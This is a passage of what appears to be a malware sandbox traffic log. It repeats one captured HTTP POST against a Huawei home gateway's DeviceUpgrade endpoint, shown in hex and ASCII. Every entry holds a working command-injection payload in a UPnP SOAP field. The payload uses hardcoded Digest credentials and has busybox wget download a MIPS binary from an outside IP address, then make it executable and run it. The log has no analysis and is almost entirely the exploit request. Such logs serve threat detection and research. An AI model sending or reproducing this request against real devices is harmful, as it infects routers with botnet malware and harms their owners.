HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
